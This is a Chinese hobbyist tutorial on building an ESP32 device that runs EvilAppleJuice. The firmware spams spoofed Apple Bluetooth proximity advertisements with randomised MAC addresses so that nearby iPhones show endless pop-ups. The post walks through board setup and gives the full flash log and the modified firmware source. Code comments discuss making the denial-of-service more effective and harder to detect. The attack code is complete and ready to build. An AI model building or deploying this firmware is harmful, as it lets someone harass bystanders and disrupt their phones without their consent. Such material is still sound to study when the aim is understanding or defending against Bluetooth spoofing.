ESP32使用EvilAppleJuice实现苹果设备无限弹窗
运行效果
使用材料
电脑
ESP32开发板(CH340)
一份程序 ckcr4lyf/EvilAppleJuice-ESP32: Spam Apple Proximity Messages via an ESP32 (github.com)
制作步骤
安装CH340驱动程序
插入开发板
此时可以在设备管理器里看到开发板
vscode安装platformIO插件并克隆项目导入
打开文件夹后会自动安装依赖
修改platformio.ini中的型号
我的板子是esp32,但是原始项目是esp32-c3,直接烧录会失败
[env:esp32dev] platform = espressif32 board = esp32dev framework = arduino monitor_speed = 115200
build && upload
* Executing task: C:\Users\80597\.platformio\penv\Scripts\platformio.exe run --target upload Processing esp32dev (platform: espressif32; board: esp32dev; framework: arduino) -------------------------------------------------------------------------------------------------------------------- Verbose mode can be enabled via `-v, --verbose` option CONFIGURATION: https://docs.platformio.org/page/boards/espressif32/esp32dev.html PLATFORM: Espressif 32 (6.4.0) > Espressif ESP32 Dev Module HARDWARE: ESP32 240MHz, 320KB RAM, 4MB Flash DEBUG: Current (cmsis-dap) External (cmsis-dap, esp-bridge, esp-prog, iot-bus-jtag, jlink, minimodule, olimex-arm-usb-ocd, olimex-arm-usb-ocd-h, olimex-arm-usb-tiny-h, olimex-jtag-tiny, tumpa) PACKAGES: - framework-arduinoespressif32 @ 3.20011.230801 (2.0.11) - tool-esptoolpy @ 1.40501.0 (4.5.1) - tool-mkfatfs @ 2.0.1 - tool-mklittlefs @ 1.203.210628 (2.3) - tool-mkspiffs @ 2.230.0 (2.30) - toolchain-xtensa-esp32 @ 8.4.0+2021r2-patch5 LDF: Library Dependency Finder -> https://bit.ly/configure-pio-ldf LDF Modes: Finder ~ chain, Compatibility ~ soft Found 33 compatible libraries Scanning dependencies... Dependency Graph |-- ESP32 BLE Arduino @ 2.0.0 Building in release mode Retrieving maximum program size .pio\build\esp32dev\firmware.elf Checking size .pio\build\esp32dev\firmware.elf Advanced Memory Usage is available via "PlatformIO Home > Project Inspect" RAM: [= ] 11.5% (used 37816 bytes from 327680 bytes) Flash: [======== ] 82.0% (used 1074805 bytes from 1310720 bytes) Configuring upload protocol... AVAILABLE: cmsis-dap, esp-bridge, esp-prog, espota, esptool, iot-bus-jtag, jlink, minimodule, olimex-arm-usb-ocd, olimex-arm-usb-ocd-h, olimex-arm-usb-tiny-h, olimex-jtag-tiny, tumpa CURRENT: upload_protocol = esptool Looking for upload port... Auto-detected: COM10 Uploading .pio\build\esp32dev\firmware.bin esptool.py v4.5.1 Serial port COM10 Connecting.... Chip is ESP32-D0WD-V3 (revision v3.1) Features: WiFi, BT, Dual Core, 240MHz, VRef calibration in efuse, Coding Scheme None Crystal is 40MHz MAC: 08:d1:f9:ec:f4:78 Uploading stub... Running stub... Stub running... Changing baud rate to 460800 Changed. Configuring flash size... Flash will be erased from 0x00001000 to 0x00005fff... Flash will be erased from 0x00008000 to 0x00008fff... Flash will be erased from 0x0000e000 to 0x0000ffff... Flash will be erased from 0x00010000 to 0x00117fff... Compressed 17536 bytes to 12203... Writing at 0x00001000... (100 %) Wrote 17536 bytes (12203 compressed) at 0x00001000 in 0.4 seconds (effective 373.2 kbit/s)... Hash of data verified. Compressed 3072 bytes to 146... Writing at 0x00008000... (100 %) Wrote 3072 bytes (146 compressed) at 0x00008000 in 0.0 seconds (effective 946.0 kbit/s)... Hash of data verified. Compressed 8192 bytes to 47... Writing at 0x0000e000... (100 %) Wrote 8192 bytes (47 compressed) at 0x0000e000 in 0.0 seconds (effective 1894.2 kbit/s)... Hash of data verified. Compressed 1080560 bytes to 681146... Writing at 0x00010000... (2 %) Writing at 0x0001bcf3... (4 %) Writing at 0x000276a4... (7 %) Writing at 0x00037be5... (9 %) Writing at 0x0003d11d... (11 %) Writing at 0x00042a88... (14 %) Writing at 0x000483cb... (16 %) Writing at 0x0004d996... (19 %) Writing at 0x00052fb8... (21 %) Writing at 0x00058a42... (23 %) Writing at 0x0005e41f... (26 %) Writing at 0x00063a0e... (28 %) Writing at 0x00068d90... (30 %) Writing at 0x0006e1de... (33 %) Writing at 0x000745b5... (35 %) Writing at 0x00079e43... (38 %) Writing at 0x0007faa9... (40 %) Writing at 0x000855d6... (42 %) Writing at 0x0008aebf... (45 %) Writing at 0x0009055c... (47 %) Writing at 0x0009609b... (50 %) Writing at 0x0009b648... (52 %) Writing at 0x000a0fbc... (54 %) Writing at 0x000a6dc3... (57 %) Writing at 0x000ad13b... (59 %) Writing at 0x000b3b46... (61 %) Writing at 0x000b936e... (64 %) Writing at 0x000beeb2... (66 %) Writing at 0x000c436a... (69 %) Writing at 0x000c9af0... (71 %) Writing at 0x000cf669... (73 %) Writing at 0x000d5482... (76 %) Writing at 0x000db836... (78 %) Writing at 0x000e146d... (80 %) Writing at 0x000e6e17... (83 %) Writing at 0x000ec737... (85 %) Writing at 0x000f2c0b... (88 %) Writing at 0x000fae65... (90 %) Writing at 0x001036a0... (92 %) Writing at 0x00109491... (95 %) Writing at 0x0010f067... (97 %) Writing at 0x001146d1... (100 %) Wrote 1080560 bytes (681146 compressed) at 0x00010000 in 15.5 seconds (effective 559.3 kbit/s)... Hash of data verified. Leaving... Hard resetting via RTS pin... =========================================== [SUCCESS] Took 22.72 seconds =========================================== * Terminal will be reused by tasks, press any key to close it.
测试弹窗功能
增加个led灯闪烁功能来显示运行状态
// This example takes heavy inpsiration from the ESP32 example by ronaldstoner
// Based on the previous work of chipik / _hexway / ECTO-1A & SAY-10
// See the README for more info
#include <Arduino.h>
#include <BLEDevice.h>
#include <BLEUtils.h>
#include <BLEServer.h>
#include "devices.hpp"
const int ledPin = 2;
BLEAdvertising *pAdvertising; // global variable
uint32_t delaySeconds = 500; //ms
int device_choice = 0;
void setup() {
Serial.begin(115200);
Serial.println("Starting ESP32 BLE");
// This is specific to the AirM2M ESP32 board
// https://wiki.luatos.com/chips/esp32c3/board.html
pinMode(12, OUTPUT);
pinMode(13, OUTPUT);
BLEDevice::init("AirPods 69");
pinMode(ledPin, OUTPUT);
// Create the BLE Server
BLEServer *pServer = BLEDevice::createServer();
pAdvertising = pServer->getAdvertising();
// seems we need to init it with an address in setup() step.
esp_bd_addr_t null_addr = {0xFE, 0xED, 0xC0, 0xFF, 0xEE, 0x69};
pAdvertising->setDeviceAddress(null_addr, BLE_ADDR_TYPE_RANDOM);
}
void loop() {
// Turn lights on during "busy" part
digitalWrite(12, HIGH);
digitalWrite(13, HIGH);
// First generate fake random MAC
esp_bd_addr_t dummy_addr = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
for (int i = 0; i < 6; i++){
dummy_addr[i] = random(256);
// It seems for some reason first 4 bits
// Need to be high (aka 0b1111), so we
// OR with 0xF0
if (i == 0){
dummy_addr[i] |= 0xF0;
}
}
BLEAdvertisementData oAdvertisementData = BLEAdvertisementData();
// Randomly pick data from one of the devices
// First decide short or long
// 0 = long (headphones), 1 = short (misc stuff like Apple TV)
digitalWrite(ledPin, HIGH);
delay(200); // 延时
if (device_choice == 0){
int index = random(17);
oAdvertisementData.addData(std::string((char*)DEVICES[index], 31));
device_choice=1;
} else {
int index = random(12);
oAdvertisementData.addData(std::string((char*)SHORT_DEVICES[index], 23));
device_choice=0;
}
digitalWrite(ledPin, LOW);
/* Page 191 of Apple's "Accessory Design Guidelines for Apple Devices (Release R20)" recommends to use only one of
the three advertising PDU types when you want to connect to Apple devices.
// 0 = ADV_TYPE_IND,
// 1 = ADV_TYPE_SCAN_IND
// 2 = ADV_TYPE_NONCONN_IND
Randomly using any of these PDU types may increase detectability of spoofed packets.
What we know for sure:
- AirPods Gen 2: this advertises ADV_TYPE_SCAN_IND packets when the lid is opened and ADV_TYPE_NONCONN_IND when in pairing mode (when the rear case btton is held).
Consider using only these PDU types if you want to target Airpods Gen 2 specifically.
*/
int adv_type_choice = random(3);
if (adv_type_choice == 0){
pAdvertising->setAdvertisementType(ADV_TYPE_IND);
} else if (adv_type_choice == 1){
pAdvertising->setAdvertisementType(ADV_TYPE_SCAN_IND);
} else {
pAdvertising->setAdvertisementType(ADV_TYPE_NONCONN_IND);
}
// Set the device address, advertisement data
pAdvertising->setDeviceAddress(dummy_addr, BLE_ADDR_TYPE_RANDOM);
pAdvertising->setAdvertisementData(oAdvertisementData);
// Set advertising interval
/* According to Apple' Technical Q&A QA1931 (https://developer.apple.com/library/archive/qa/qa1931/_index.html), Apple recommends
an advertising interval of 20ms to developers who want to maximize the probability of their BLE accessories to be discovered by iOS.
These lines of code fixes the interval to 20ms. Enabling these MIGHT increase the effectiveness of the DoS. Note this has not undergone thorough testing.
*/
//pAdvertising->setMinInterval(0x20);
//pAdvertising->setMaxInterval(0x20);
//pAdvertising->setMinPreferred(0x20);
//pAdvertising->setMaxPreferred(0x20);
// Start advertising
Serial.println("Sending Advertisement...");
pAdvertising->start();
// Turn lights off while "sleeping"
digitalWrite(12, LOW);
digitalWrite(13, LOW);
delay(delaySeconds); // delay for delaySeconds seconds
pAdvertising->stop();
}